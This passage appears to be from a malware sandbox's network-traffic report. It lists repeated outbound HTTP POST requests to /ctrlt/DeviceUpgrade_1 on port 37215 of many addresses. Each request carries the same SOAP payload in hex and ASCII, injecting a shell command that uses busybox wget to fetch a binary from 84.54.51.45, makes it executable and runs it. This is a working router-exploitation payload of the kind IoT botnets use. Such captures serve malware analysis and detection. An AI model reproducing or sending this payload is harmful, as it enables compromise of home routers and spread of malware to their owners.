68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15192.168.2.153558241.57.197.22437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731523991 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16192.168.2.154307641.96.73.20737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731571913 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17192.168.2.155892641.228.223.17237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731594086 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18192.168.2.154488841.70.226.6937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731615067 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19192.168.2.155130041.3.105.7137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731622934 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20192.168.2.155280641.7.80.17037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731652975 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21192.168.2.154004241.71.6.9037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731676102 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22192.168.2.155412641.199.249.22237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731729031 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23192.168.2.153569241.221.116.937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731790066 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24192.168.2.154331441.191.248.21237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731790066 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25192.168.2.154677641.133.22.8837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731834888 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
